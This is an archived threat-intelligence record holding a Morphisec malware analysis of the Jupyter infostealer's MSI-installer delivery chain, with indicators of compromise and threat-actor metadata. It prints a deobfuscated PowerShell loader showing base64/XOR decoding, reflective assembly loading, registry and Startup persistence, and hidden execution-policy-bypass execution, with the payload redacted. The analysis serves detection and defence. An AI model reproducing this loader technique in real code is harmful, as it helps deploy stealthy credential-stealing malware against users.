{ "id": "62333f31-f041-4bca-a5a4-aee05eefd841", "created_at": "2026-04-06T00:15:51.789606Z", "updated_at": "2026-04-10T03:36:48.258661Z", "deleted_at": null, "sha1_hash": "a8c24ad5188ca9469c1d4ec615ad5182cc311ae4", "title": "New Jupyter Evasive Delivery through MSI Installer", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 808936, "plain_text": "New Jupyter Evasive Delivery through MSI Installer\r\nBy Nadav Lorber\r\nArchived: 2026-04-05 22:08:11 UTC\r\nIn 2020, Morphisec introduced the Jupyter infostealer, a .NET attack that primarily targets Chromium, Firefox,\r\nand Chrome browser data while also maintaining the additional capabilities of a backdoor. \r\nSince that time, Jupyter has remained active and highly evasive. It has continued to receive very low to zero\r\ndetections in the VirusTotal database, maintaining the ability to bypass detection solutions. \r\nThen, on 8 September 2021, we identified a new delivery chain within Jupyter that passes under the radar of\r\nsecurity solutions. Following this discovery, the Morphisec Labs team has been made aware of multiple high-level\r\ntargets that are under threat from the Jupyter infostealer. We are currently investigating the scope of the\r\ncampaign.\r\nThe blog post that follows outlines the new delivery chain, showcasing how threat actors continue to develop their\r\nattacks to become more efficient and evasive.\r\nEditor’s Note: This blog post has been updated as per the request of Advanced Installer. \r\nTechnical Details\r\nunnamed\r\nFigure 1: The attack flow of the new Jupyter infostealer\r\nThe MSI Payload\r\nIn this section, we will briefly examine some of the payload`s shared attributes in order to get an overview of what\r\nindicators to expect. This is based on the six variants that we have observed.\r\nPayload Size and Name\r\nLike previous Jupyter payloads, the size of the MSI payloads is consistently over 100MBs. This allows the\r\npayload to thwart online AV scanners.\r\nThe naming convention for the payload is:\r\nPotential document subjects\r\nWords are separated with a dash ‘-’\r\nEach word starts with a capital letter\r\nExamples can be found in the IOCs section under the heading  “MSI Payload Names.” \r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 1 of 8\n\nMSI Third-Party Installer Wizard\r\nThe payloads were generated with a trial version of Advanced Installer (version 18.6.1 build 2c9a75c6).\r\nAs described on their website, the Advanced Installer wizard is an ‘All-in-one’ application packaging tool. By\r\nusing this tool, threat actors gain access to the easy implementation of obscured script executions.\r\nCustomizing installer PowerShell operations is a legitimate functionality that the attackers misuse, as with other\r\nattack chains. This same operation is frequently used as part of legitimate products or services. We advise against\r\nflagging any PowerShell scripts originating from Advanced Installer without prior evaluation of the command\r\nitself. It is worth noting as well that PowerShell functionalities are also available in other installers.\r\nThe attribution can be found either in the file properties (OLE Compound) or in the Installer property table.\r\nFigure 2: OLE Compound File Information\r\nFigure 2: OLE Compound file information\r\nThe property table\r\nFigure 3: Property table\r\nDecoy Installation Executable\r\nAs seen in Figure 1 above, all of the observed variants are described as Nitro Pro 13. Once the victim runs the\r\nMSI payload, it executes a legitimate installation binary of Nitro Pro 13. Correlating this attribution with the\r\nvariant’s file names suggests that the delivery method disguises it as a PDF.\r\nAn image of the Nitro Pro 13 installation\r\nFigure 4: Nitro Pro 13 Installation\r\nWhile all of the variants are described as Nitro, one of them actually contains SumatraPDF instead.\r\nAn installer for Sumatra PDF\r\nFigure 5: Sumatra PDF installation\r\nDigital Signature\r\nTwo of the variants are signed with a (currently) valid certificate named ‘TACHOPARTS SP Z O O’.\r\nThe Tachoparts certificate that was likely stolen or impersonated\r\nFigure 6: Tachoparts certificate\r\nBased on the following certificate data, we can assume that the threat actor either impersonated the certificate or\r\nstole it from a legitimate business in Poland.\r\nimage12\r\nFigure 7: Tachoparts’ business information from Google\r\nAnother variant was signed with a revoked certificate named ‘OOO Sistema’.\r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 2 of 8\n\nThe OOO Sistema certificate that was likely stolen or impersonated\r\nFigure 8: OOO Sistema certificate\r\nAs with the previous certificate, this one is also correlated with a legitimate business. It also was likely either an\r\nimpersonation or stolen from the business. \r\nOOO Sistema's certificate\r\nFigure 9: OOO Sistema business information from Google\r\nThe other 2 variants are signed with certificates named:\r\nFORMICA Solutions a.s.\r\nOOO Ruvents\r\nThe PowerShell Execution\r\nThe initial suspicious indicator visible in the dynamic analysis is the PowerShell command-line spawned\r\nby msiexec.exe.\r\nCommand Line\r\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -Noninteractive\r\n-ExecutionPolicy Bypass\r\n-File 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\pssEA35.ps1'\r\n-propFile 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\msiEA13.txt'\r\n-scriptFile 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\scrEA14.ps1'\r\n-scriptArgsFile 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\scrEA15.txt'\r\n-propSep ' :\u003c-\u003e: '\r\n-testPrefix '_testValue.'\r\nCode block 1: CMD Shell command-line\r\nThis command-line is generated by a feature in the Advanced Installer that is designed to execute the PowerShell\r\nloader as a ‘CustomAction’ attribute defined in MSI Installers.\r\nThe file names within the parameters differ between variants but keep the same pattern. For example\r\nin ‘scrEA14.ps1’, the EA14 is represented by four hex characters. These four characters are different between the\r\npayload variants.\r\nimage9\r\nFigure 9: PowerShell loader embedded in the CustomAction within AdvancedInstaller\r\nunnamed (1)Figure 10: PowerShell loader embedded in the CustomAction within AdvancedInstaller\r\nJupyter PowerShell Loader\r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 3 of 8\n\nThe PowerShell file in the -scriptFile parameter presented in Code block 1 represents the Jupyter PowerShell\r\nloader.\r\nThis loader is very similar to the previous Jupyter loaders in that it keeps a very evasive file with low to 0\r\ndetections on VirusTotal, which is rare for a full PowerShell loader (loader code with an embedded payload).\r\nWhile the Jupyter loaders are widely covered in our and other blogs, the new variant shares the same code pattern.\r\nThe following code block is an example of a deobfuscated and beautified version of it:\r\n$b64_enc_payload='deducted';\r\n$random_path_str=jeiJBgXRTuVfsm;\r\n$payload_directory_path=\"$ENV:APPDATA\\Microsoft\\\"+$random_path_str;\r\n$enc_payload_path=$payload_directory_path+'\\'+$random_path_str+'.'+\r\n$random_path_str;\r\n[System.IO.File]::WriteAllBytes($enc_payload_path,\r\n[System.Convert]::FromBase64String($b64_enc_payload));\r\n$decode_and_execute_payload_script='below code embedded in comment'\r\n'''\r\n $xor_key = \"deducted base64 key\";\r\n $b64_enc_payload = [System.IO.File]::ReadAllBytes($enc_payload_path);\r\n For ($i = 0; $i -lt $b64_enc_payload.Count;) {\r\n For ($y = 0; $y -lt $xor_key.Length; $y++) {\r\n $b64_enc_payload[$i]=$b64_enc_payload[$i] -bxor $xor_key[$y];\r\n $i++;\r\n if($i -ge $b64_enc_payload.Count) {\r\n $y=$xor_key.Length\r\n }\r\n }\r\n };\r\n [System.Reflection.Assembly]::Load($b64_enc_payload); // Loads ‘interact’ method\r\n'''\r\nCreate_Registry_Key-reg_path(“\u003cREG_PATH”\u003e)-execution_command('Powershell -WindowStyle\r\nHidden -ep Bypass -Command \" + $decode_and_execute_payload_script');\r\nCreate_Registry_Key-reg_path(“\u003cREG_PATH”\u003e)-execution_command$random_path_str.ToLower();\r\n$lnk_object=New-Object-ComObjectWScript.Shell.CreateShortcut($ENV:APPDATA+\r\n'\u003cStartup_Lnk_Path');\r\n$lnk_object.TargetPath=$payload_directory_path+'\\'+$random_path_str;\r\n$lnk_object.WindowStyle=7;\r\n$lnk_object.Save();\r\nIEX$decode_and_execute_payload_script;\r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 4 of 8\n\nCode block 2: Deobfuscated Jupyter PowerShell loader\r\nNote that like the previous versions, this one also reflectively loads a DLL that initializes execution under the\r\nDeimos namespace in the Mars class (Mars.Deimos).\r\nThe .NET DLL Payload\r\nIn our previous blog, we attributed the payloads to their internal version. The following table correlates the\r\nobserved internal version and the MSI payload’s first submission date and detections on VirusTotal.\r\nJupyter DLL Internal Version VirusTotal First Submission\r\nSP-9\r\n08 September 2021\r\n1 / 57 Malicious detections\r\nSP-10\r\n08 September 2021\r\n2 / 57 Malicious detections\r\nSP-11\r\n10 September 2021\r\n0 / 57 Malicious detections\r\nSP-13\r\n13 September 2021\r\n0 / 57 Malicious detections\r\nSP-14\r\n21 September 2021\r\n0 / 57 Malicious detections\r\nSP-16\r\n21 September 2021\r\n0 / 57 Malicious detections\r\nWhile all of the .NET DLL Payloads should be obfuscated, it appears that the SP-10 variant contains source-code\r\nstrings. The following figure presents the payload methods and class names.\r\nimage3\r\nFigure 11: Jupyter .NET DLL Payload methods and classes\r\nConclusion\r\nThe evolution of the Jupyter info stealer/backdoor from when we first identified it in 2020 proves the truth of the\r\nstatement that threat actors are always innovating. That this attack continues to have low or no detections on\r\nVirusTotal further indicates the facility with which threat actors evade detection-based solutions. It’s clear that a\r\nnew approach is required to threat prevention, as it’s likely these evasive attacks will continue.\r\nThis is why Morphisec architected its solutions with Automated Moving Target Defense to emphasize\r\ndeterministic prevention of evasive attacks instead of detection. Customers who leverage the Morphisec\r\nPreemptive Cyber Defense Platform on their endpoints, on-premises servers, and in the cloud can remain\r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 5 of 8\n\nconfident that they are secure from evasive threats such as the Jupyter infostealer, regardless of the detection rate\r\nin VirusTotal.\r\nIOCs\r\nMSI Payload Hashes\r\nbc7986f0c9f431b839a13a9a0dfa2711f86e9e9afbed9b9b456066602881ba71\r\n1197067d50dd5dd5af12e715e2cc00c0ba1ff738173928bbcfbbad1ee0a52f21\r\n8e06c31285911c936425921ccf9f20107160174acd602cc7f2dd8ca677e8956d\r\n9e3b4e4948521467216515e92812e5a47fb23f5bcb3a8b1a6014ae2f038c7181\r\ne466158ff4c6da37213dc9e0f05038d05ebead93febf51a5ec3ac6e2b9e3e22d\r\n8447b77cc4b708ed9f68d0d71dd79f5e66fe27fedd081dcc1339b6d35c387725\r\n28b41fbae3fec855c2f4779dde8d4e990d3e5ceede80a89bcf420a59459d84b8\r\n7ada6e666c34aacaf7c93d11ca2e563ec53da37fb23a181631809d0d5ef14387\r\n57171e869512862baa9e4fd15b18c1d577a31f2ca20b47435f138f989bca2d72\r\n394fa8af1348cbcf3d9beae6dc8b6afb24c6b96bcc3be52601a5b84f9adf007c\r\n3b0950f1602b43e7cadc43740de00c77ab481c8459cacd7397dd66d1d75d2641\r\n5cf24553e521de102628e1ebdadb69a6623904f08b51cf5b1ea14779e03e8682\r\n7f3cfd60860c47fc730643f58fcd10a8c9361c3a8de0fd162ea2751e4c514271\r\nb1620fbd2194bc09812c01134b7f60292cfbabd26f1360ecb04c1f66cb2dd4f5\r\n10221ceffbc7d7e59b17b1968d0fa01c8124efa70d1d5a486e53211e4754a22d\r\n341881d11fd748a81c8cee584dc42392a564aeb839faf7afa136004701e656c1\r\n619678ea113d164106f22ce5a9145d2cc87ef730461015dcd5a4343d05420a55\r\nc61348ab7e5ffeb9ba5d1077b13c49bde4d841c5ada9a119f8234af89421f783\r\n3303926a6468dab25286a65bb9f3e5883a8938e6501031b3b85e21f182d1ed0d\r\n1e7914f799371cbc8560bc52203d3531bb20cb4f6092158c76a4842dbf85dabc\r\nAdvancedInstaller PowerShell Hash\r\n88748aae11029228d84aef0855f4bc084dfd70450db1f7029746d8bc85182f93\r\nJupyter PowerShell Loader Hashes\r\n934cb210db692c3ebcd9ba8d113b1669573a20db79c02a2587a4bead10d8dfeb\r\ne34af1b6edf33b155ca9854d084577c30e1bc9d96eee10014277a0e55a47beef\r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 6 of 8\n\nf6aa48bc45be3b603a48a5261a28cc75e9c1c2f65aa37bb807b6c1bd80dce05a\r\n8bd8fa4a5500d390d69941cb5d89a568d46d49bc4ac731a6c548b7d8e69625c2\r\n1d90b6c3b59a4287697c81a10ea950bda9326af8b629ef59c8b5bde3a7486683\r\n42c62c6bdd12f6ed12f65e6bebc05b2980fb1594d3efa9abdf81ac61bbbd6fc8\r\nf8ffeda0cf4e3519a3af952f17ac137aa59b7d547612e5b6595dad4e26165027\r\n0ef218d23cd230f09a729965863394f36a0b82d78f7ff50381cac3bbec3bbcab\r\nab1aa0bf3562fbc6de28e12a4625bf8fe541457d8991e14070529031a0b499e5\r\nJupyter Payloads\r\n8bcf6506b21f67641fa753d7328d3c1045541f84bc62bbe43d485f38e3d5e3ae\r\n1f034e91613ab7c290d172b87200a000365728f218cbd4491f59d09a20bfd866\r\n8c35f2a78e366abf2450d5882c49c69ee5cc01dba3743938b45cedc2b5dee3a3\r\n1c5082cb7fbd011feb14909320b163b038febed29700568f9a2c7b5a416fad51\r\n2524cea17b8ec62d30a93751fc42cc4e33350caaff5ba9a2327c048b715b2d4a\r\n39b0e2965daf855fbd25facbdd0dcb84e3a2103d0ac37699b27284dd918dfcb7\r\n01f0cef500ace135fce8ad80a3e37078a6af8433b6877e1aa461da4afe80c111\r\n0e6c901e3b98d2714dc31a29e92a0c89798bfa42c792b661eb19564401606499\r\ned4370be662514e83c484b7eff043b5da4c58d268c6a0ca2d087c50a4b761eb7\r\nd5bab9db44e9b9b27cf32442e061a4b63968ed2f1286fe8b0db0e317b17feee9\r\nd10b7a077a506f76cc14ff96f348f3cf114a8ea3e311f7061e60cce2f2cc5550\r\ne46fb74c7a478177b1487d945964bd8cbdb853b485087e85e9bb777470872a7f\r\nac436440000a417e0a2f699b7fd966ff67935251dedc98c9b9c19c61ee930d83\r\nC2 IPs\r\n45.42.201[.]248\r\n37.120.237[.]251\r\n188.241.83[.]61\r\n146.70.41[.]157\r\n149.255.35[.]179\r\n37.221.114[.]23\r\nMSI Payload Names\r\nMetlife-Disability-Waiver-Of-Premium-Benefit-Rider.msi\r\nMedical-Engagement-Scale-Questionnaire.msi\r\nDue-Diligence-Checklist-For-Oil-And-Gas-Properties.msi\r\nNon-Renewal-Of-Lease-Letter-To-Landlord-From-Tenant.msi\r\nFedex-Tracking-By-Shipper-Receipt.msi\r\nChristian-Doctrine-Clauses-List.msi\r\nOmnicell-Cabinet-User-Manual.msi\r\nWells-Fargo-Subpoena-Processing-Department-Phoenix-Az.msi\r\nBulgarian Power Burst Training pdf.msiapp.msi\r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 7 of 8\n\nAbout the author\r\nNadav Lorber\r\nSecurity Research Tech Lead\r\nNadav Lorber is a leader on Morphisec’s cutting-edge threat research team. He began his career in threat\r\nintelligence in 2013, where he was a SOC Specialist for the Israeli government’s military intelligence department.\r\nSince joining Morphisec, Nadav has helped uncover key insights on topics like Jupyter Infostealer, Log4j, and the\r\nSnip3 crypter.\r\nSource: https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer" ], "report_names": [ "new-jupyter-evasive-delivery-through-msi-installer" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "9041c438-4bc0-4863-b89c-a32bba33903c", "created_at": "2023-01-06T13:46:38.232751Z", "updated_at": "2026-04-10T02:00:02.888195Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove" ], "source_name": "MISPGALAXY:Nitro", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b44a04-a080-4465-973d-976ce53777de", "created_at": "2022-10-25T16:07:23.911791Z", "updated_at": "2026-04-10T02:00:04.786538Z", "deleted_at": null, "main_name": "Nitro", "aliases": [ "Covert Grove", "Nitro" ], "source_name": "ETDA:Nitro", "tools": [ "AngryRebel", "Backdoor.Apocalipto", "Chymine", "Darkmoon", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Moudour", "Mydoor", "PCClient", "PCRat", "Poison Ivy", "SPIVY", "Spindest", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434551, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a8c24ad5188ca9469c1d4ec615ad5182cc311ae4.pdf", "text": "https://archive.orkl.eu/a8c24ad5188ca9469c1d4ec615ad5182cc311ae4.txt", "img": "https://archive.orkl.eu/a8c24ad5188ca9469c1d4ec615ad5182cc311ae4.jpg" } }